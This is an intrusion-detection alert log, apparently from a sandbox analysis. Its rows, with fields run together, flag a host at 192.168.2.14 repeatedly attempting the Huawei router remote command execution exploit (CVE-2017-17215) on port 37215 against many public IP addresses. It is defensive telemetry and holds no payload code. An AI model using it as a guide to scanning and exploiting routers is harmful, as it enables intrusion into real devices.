                                                    07/10/24-08:27:14.875328TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5583637215192.168.2.14197.100.12.175
                                                    07/10/24-08:26:42.379433TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3549437215192.168.2.14197.115.139.23
                                                    07/10/24-08:27:27.077198TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4197437215192.168.2.14157.246.255.113
                                                    07/10/24-08:27:23.887861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5339637215192.168.2.1441.1.161.122
                                                    07/10/24-08:26:17.997634TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5813437215192.168.2.14197.64.128.218
                                                    07/10/24-08:26:43.756816TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3539637215192.168.2.14197.215.240.23
                                                    07/10/24-08:26:14.739677TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5523237215192.168.2.14157.147.122.219
                                                    07/10/24-08:26:59.539050TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4845837215192.168.2.14197.133.198.27
                                                    07/10/24-08:26:34.257724TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3366037215192.168.2.14197.124.8.12
                                                    07/10/24-08:26:49.781765TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3373437215192.168.2.1441.89.39.153
                                                    07/10/24-08:26:49.850247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4607837215192.168.2.1441.237.102.222
                                                    07/10/24-08:27:05.133691TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3399237215192.168.2.14197.199.6.240
                                                    07/10/24-08:26:11.658896TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3435837215192.168.2.14197.189.249.195
                                                    07/10/24-08:27:33.810872TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5560237215192.168.2.1441.163.207.210
                                                    07/10/24-08:26:28.850354TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6037437215192.168.2.1441.136.90.229
                                                    07/10/24-08:26:49.795312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5132237215192.168.2.1441.86.133.19
                                                    07/10/24-08:26:52.050509TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3473637215192.168.2.1441.94.117.0
                                                    07/10/24-08:27:13.949060TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5870837215192.168.2.1466.159.41.141
                                                    07/10/24-08:26:13.794685TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3355037215192.168.2.1441.136.250.104
                                                    07/10/24-08:26:43.862502TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4459237215192.168.2.14157.240.72.177
                                                    07/10/24-08:27:13.863038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4781637215192.168.2.14157.130.178.114
                                                    07/10/24-08:27:22.571797TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4432837215192.168.2.14197.176.3.220
                                                    07/10/24-08:26:43.893458TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3678037215192.168.2.14197.216.10.202
                                                    07/10/24-08:26:11.538222TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3583037215192.168.2.1441.174.50.70
                                                    07/10/24-08:27:17.107652TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3387437215192.168.2.1441.128.14.221
                                                    07/10/24-08:26:49.864771TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5855637215192.168.2.14191.62.250.225
                                                    07/10/24-08:26:11.115626TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4644037215192.168.2.14157.158.61.103
                                                    07/10/24-08:26:20.161677TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3867037215192.168.2.14197.11.67.81
                                                    07/10/24-08:26:53.177633TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4196037215192.168.2.1441.187.143.114
                                                    07/10/24-08:26:57.631188TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5991237215192.168.2.1441.66.226.120
                                                    07/10/24-08:27:24.964611TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4246237215192.168.2.14157.252.216.206
                                                    07/10/24-08:27:19.215093TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6082637215192.168.2.14197.9.74.144
                                                    07/10/24-08:27:17.084345TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5951637215192.168.2.14203.106.221.148
                                                    07/10/24-08:26:23.322361TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5648637215192.168.2.142.26.131.103
                                                    07/10/24-08:26:36.414478TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4880037215192.168.2.14157.39.169.241
                                                    07/10/24-08:26:17.951763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5755437215192.168.2.14126.140.143.254
                                                    07/10/24-08:27:05.203843TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4615837215192.168.2.14220.93.108.198
                                                    07/10/24-08:26:59.647957TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6072437215192.168.2.14151.222.205.88
                                                    07/10/24-08:26:26.605187TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4398237215192.168.2.1441.45.243.93
                                                    07/10/24-08:26:29.768210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5361237215192.168.2.14197.44.120.208
                                                    07/10/24-08:27:24.969390TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3472437215192.168.2.1443.117.218.101
                                                    07/10/24-08:26:57.517659TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5639037215192.168.2.1441.204.245.164
                                                    07/10/24-08:26:14.771474TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4016237215192.168.2.14176.199.79.189
                                                    07/10/24-08:26:36.378421TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4796037215192.168.2.1441.76.128.31
                                                    07/10/24-08:26:23.335498TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5996437215192.168.2.14157.221.178.57
                                                    07/10/24-08:27:23.944387TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5870637215192.168.2.14157.222.96.154
                                                    07/10/24-08:26:31.055079TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3837237215192.168.2.14220.130.138.80
                                                    07/10/24-08:26:52.000964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4312037215192.168.2.14210.21.54.135
                                                    07/10/24-08:27:05.094714TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5034437215192.168.2.14197.116.79.55
                                                    07/10/24-08:27:14.829159TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5917037215192.168.2.14157.211.2.182
                                                    07/10/24-08:27:31.447886TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3705437215192.168.2.14139.118.46.99
                                                    07/10/24-08:26:28.853049TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5829837215192.168.2.1441.121.231.134
                                                    07/10/24-08:27:10.672315TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4296637215192.168.2.14151.216.12.56
                                                    07/10/24-08:26:23.297905TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3769637215192.168.2.14205.86.211.52
                                                    07/10/24-08:27:02.720199TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3407837215192.168.2.1441.14.209.22
                                                    07/10/24-08:26:38.605259TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5277037215192.168.2.14157.248.116.161
                                                    07/10/24-08:26:45.603394TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5321237215192.168.2.14197.106.25.124
                                                    07/10/24-08:26:53.171855TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5674637215192.168.2.14151.48.236.119
                                                    07/10/24-08:26:47.867621TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3909837215192.168.2.1441.250.160.110
                                                    07/10/24-08:26:49.854834TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5200037215192.168.2.14157.23.32.98
                                                    07/10/24-08:26:26.535495TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6051637215192.168.2.14197.70.206.12
                                                    07/10/24-08:27:23.953433TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5633037215192.168.2.14104.229.94.16
                                                    07/10/24-08:27:19.166919TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3617037215192.168.2.14157.233.50.112
                                                    07/10/24-08:27:23.959753TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5319837215192.168.2.14157.220.123.164
                                                    07/10/24-08:26:15.862104TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4734237215192.168.2.14157.55.230.87
                                                    07/10/24-08:27:16.990207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4905837215192.168.2.1441.231.105.231
                                                    07/10/24-08:26:43.692447TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5093237215192.168.2.1441.218.225.201
                                                    07/10/24-08:26:43.623006TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3440437215192.168.2.1441.116.48.68
                                                    07/10/24-08:27:02.804220TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5973037215192.168.2.14176.248.169.48
                                                    07/10/24-08:26:57.581660TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3436837215192.168.2.14202.166.96.73
                                                    07/10/24-08:26:33.246495TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4567037215192.168.2.14157.79.146.109
                                                    07/10/24-08:26:47.774106TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5215637215192.168.2.1472.4.207.202
                                                    07/10/24-08:26:20.183913TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5834637215192.168.2.14157.202.243.207
                                                    07/10/24-08:27:17.040867TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5264637215192.168.2.1469.75.251.162
                                                    07/10/24-08:27:19.343381TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5335837215192.168.2.14197.193.240.235
                                                    07/10/24-08:26:52.079207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4690237215192.168.2.14197.41.140.58
                                                    07/10/24-08:26:55.302858TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5366437215192.168.2.14197.35.197.30
                                                    07/10/24-08:26:29.805912TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5261037215192.168.2.1441.85.187.44
                                                    07/10/24-08:26:31.098099TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5458637215192.168.2.1441.197.135.106
                                                    07/10/24-08:26:43.766765TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5875637215192.168.2.14194.106.5.52
                                                    07/10/24-08:27:27.151172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3980237215192.168.2.14197.47.54.29
                                                    07/10/24-08:27:23.849464TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4298237215192.168.2.14197.233.226.104
                                                    07/10/24-08:27:24.927319TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5653437215192.168.2.14197.140.73.163
                                                    07/10/24-08:26:57.661675TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4676237215192.168.2.1441.183.1.72
                                                    07/10/24-08:27:13.998710TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5894637215192.168.2.1441.218.55.224
                                                    07/10/24-08:27:24.938068TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4435237215192.168.2.14157.169.181.226
                                                    07/10/24-08:27:24.976551TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4081637215192.168.2.1441.158.228.62
                                                    07/10/24-08:27:31.540964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5384437215192.168.2.14148.139.130.22
                                                    07/10/24-08:26:49.811589TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3788237215192.168.2.14197.20.221.174
                                                    07/10/24-08:27:22.802348TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3988437215192.168.2.14197.0.3.31
                                                    07/10/24-08:26:55.447163TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4478237215192.168.2.1441.143.30.192
                                                    07/10/24-08:26:55.442575TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4933037215192.168.2.14197.198.243.14
                                                    07/10/24-08:27:10.554051TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4822237215192.168.2.14197.45.231.59
                                                    07/10/24-08:27:11.512304TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3987237215192.168.2.1441.69.190.57
                                                    07/10/24-08:27:30.545208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5131637215192.168.2.14197.79.251.150
                                                    07/10/24-08:27:07.369689TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3977037215192.168.2.1441.205.26.202
                                                    07/10/24-08:26:23.356986TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5197637215192.168.2.14212.224.108.35
                                                    07/10/24-08:26:15.842184TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4651037215192.168.2.1441.179.70.218
                                                    07/10/24-08:27:20.471536TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3870237215192.168.2.1495.112.33.164
                                                    07/10/24-08:26:51.929780TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5815437215192.168.2.145.134.11.18
                                                    07/10/24-08:27:02.980923TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3674037215192.168.2.14197.35.216.76
                                                    07/10/24-08:26:43.662238TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5907037215192.168.2.14197.172.192.5
                                                    07/10/24-08:26:59.661983TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4649237215192.168.2.1497.129.100.136
                                                    07/10/24-08:26:20.173091TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4027837215192.168.2.14157.145.139.199
                                                    07/10/24-08:26:59.701757TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5659237215192.168.2.14197.186.25.243
                                                    07/10/24-08:27:08.307803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3286837215192.168.2.14157.129.132.228
                                                    07/10/24-08:27:13.752380TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5307037215192.168.2.1441.127.195.204
                                                    07/10/24-08:27:32.623300TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4797437215192.168.2.14157.176.177.185
                                                    07/10/24-08:26:51.983078TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3504837215192.168.2.14157.76.101.187
                                                    07/10/24-08:26:43.526771TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3516037215192.168.2.1441.103.215.120
                                                    07/10/24-08:27:32.565962TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5467237215192.168.2.14129.71.218.59
                                                    07/10/24-08:27:10.675558TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4748437215192.168.2.14197.254.209.181
                                                    07/10/24-08:26:26.528508TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5005837215192.168.2.1470.162.35.97
                                                    07/10/24-08:26:57.637294TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5736237215192.168.2.14197.154.35.176
                                                    07/10/24-08:27:28.182611TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3434637215192.168.2.1441.133.214.251
                                                    07/10/24-08:27:30.409560TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5120437215192.168.2.14157.104.201.121
                                                    07/10/24-08:27:19.315486TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5793637215192.168.2.14157.100.90.165
                                                    07/10/24-08:26:14.827128TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3808837215192.168.2.1441.242.97.143
                                                    07/10/24-08:27:02.972895TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4268637215192.168.2.14157.140.206.2
                                                    07/10/24-08:27:05.226106TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4949437215192.168.2.14157.151.230.187
                                                    07/10/24-08:26:11.661764TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4342237215192.168.2.1441.233.2.240
                                                    07/10/24-08:26:18.027188TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4970037215192.168.2.1441.103.177.172
                                                    07/10/24-08:26:26.607824TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3984837215192.168.2.1441.117.26.10
                                                    07/10/24-08:26:28.926609TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6071637215192.168.2.14189.32.37.174
                                                    07/10/24-08:26:13.852181TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4335837215192.168.2.14157.40.244.181
                                                    07/10/24-08:26:47.819008TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4722237215192.168.2.14197.133.10.181
                                                    07/10/24-08:26:17.941033TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4546837215192.168.2.14157.155.36.5
                                                    07/10/24-08:26:17.985127TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3374237215192.168.2.1441.227.102.58
                                                    07/10/24-08:27:21.455167TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3437437215192.168.2.1453.75.57.149
                                                    07/10/24-08:26:47.819008TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3435237215192.168.2.14157.49.171.6
                                                    07/10/24-08:27:07.281548TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4231837215192.168.2.14197.202.207.174
                                                    07/10/24-08:26:47.871507TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5063437215192.168.2.14157.72.171.197
                                                    07/10/24-08:26:31.063157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4302637215192.168.2.14157.38.120.237
                                                    07/10/24-08:26:22.228367TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6011637215192.168.2.1441.171.165.206
                                                    07/10/24-08:26:43.646157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6054037215192.168.2.14157.18.210.152
                                                    07/10/24-08:26:11.611492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3927237215192.168.2.1441.9.195.101
                                                    07/10/24-08:26:26.617546TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4293837215192.168.2.14217.124.119.38
                                                    07/10/24-08:27:30.538016TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4887037215192.168.2.1485.166.172.45
                                                    07/10/24-08:26:41.611140TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3531437215192.168.2.14157.37.241.96
                                                    07/10/24-08:27:22.771022TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5998037215192.168.2.14197.126.80.150
                                                    07/10/24-08:27:33.922247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3484437215192.168.2.1441.138.249.10
                                                    07/10/24-08:27:08.371486TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6067437215192.168.2.1441.104.152.198
                                                    07/10/24-08:26:38.546157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4133037215192.168.2.14157.194.228.57
                                                    07/10/24-08:26:43.780155TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5707237215192.168.2.14197.246.42.64
                                                    07/10/24-08:27:28.169904TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4827637215192.168.2.14157.13.62.118
                                                    07/10/24-08:26:20.168478TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4379637215192.168.2.14157.16.175.58
                                                    07/10/24-08:27:08.357812TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4159637215192.168.2.1441.128.11.151
                                                    07/10/24-08:26:43.793102TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4056037215192.168.2.14197.34.143.155
                                                    07/10/24-08:26:33.196369TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5586837215192.168.2.1441.12.53.122
                                                    07/10/24-08:27:24.963171TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4982837215192.168.2.14197.95.60.17
                                                    07/10/24-08:27:24.929002TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3335637215192.168.2.1441.144.90.214
                                                    07/10/24-08:27:11.476399TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4331237215192.168.2.1441.86.135.39
                                                    07/10/24-08:26:11.657674TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5950837215192.168.2.14157.253.160.119
                                                    07/10/24-08:26:42.459797TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4263237215192.168.2.14157.38.162.132
                                                    07/10/24-08:27:07.351373TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3565437215192.168.2.14197.8.83.170
                                                    07/10/24-08:26:36.389653TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6024037215192.168.2.1441.224.11.132
                                                    07/10/24-08:27:13.835787TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4988837215192.168.2.1441.196.23.58
                                                    07/10/24-08:26:51.932459TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5921437215192.168.2.14157.144.232.135
                                                    07/10/24-08:26:45.647215TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4430637215192.168.2.1458.187.154.28
                                                    07/10/24-08:26:28.912225TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3958437215192.168.2.14139.71.10.219
                                                    07/10/24-08:27:08.310609TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4433837215192.168.2.14197.241.209.129
                                                    07/10/24-08:27:28.079794TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3346837215192.168.2.14157.92.52.193
                                                    07/10/24-08:26:41.511633TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5968437215192.168.2.14197.174.121.255
                                                    07/10/24-08:27:27.158777TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3808037215192.168.2.14188.2.35.83
                                                    07/10/24-08:26:28.923936TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4344237215192.168.2.14157.26.142.124
                                                    07/10/24-08:26:52.034591TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4828037215192.168.2.14157.95.202.221
                                                    07/10/24-08:27:10.605633TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4939837215192.168.2.1495.155.67.79
                                                    07/10/24-08:27:22.896647TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3784637215192.168.2.14157.13.237.69
                                                    07/10/24-08:26:53.135908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4109837215192.168.2.14197.83.39.29
                                                    07/10/24-08:26:38.549975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3339437215192.168.2.14157.164.223.60
                                                    07/10/24-08:26:33.183618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3741037215192.168.2.14197.188.134.133
                                                    07/10/24-08:26:49.901812TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4661237215192.168.2.14157.17.242.116
                                                    07/10/24-08:26:57.510241TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4066437215192.168.2.1441.241.176.221
                                                    07/10/24-08:26:13.824276TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5594637215192.168.2.1495.231.59.84
                                                    07/10/24-08:26:34.224904TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3325237215192.168.2.14157.159.179.30
                                                    07/10/24-08:27:17.055063TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3337637215192.168.2.1441.229.74.131
                                                    07/10/24-08:26:14.786182TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3516437215192.168.2.14157.67.213.102
                                                    07/10/24-08:26:41.429574TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3971237215192.168.2.14113.162.233.140
                                                    07/10/24-08:27:02.686169TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4543637215192.168.2.1441.201.247.127
                                                    07/10/24-08:26:41.472722TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5116637215192.168.2.14157.162.67.200
                                                    07/10/24-08:26:31.084191TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3518837215192.168.2.1463.220.224.62
                                                    07/10/24-08:26:29.847000TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4443837215192.168.2.14104.98.84.254
                                                    07/10/24-08:26:38.578082TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3506437215192.168.2.14157.176.104.164
                                                    07/10/24-08:26:42.359553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3798037215192.168.2.14157.135.200.97
                                                    07/10/24-08:27:23.938620TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5655237215192.168.2.14212.143.108.202
                                                    07/10/24-08:27:10.775914TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4574237215192.168.2.14158.24.55.210
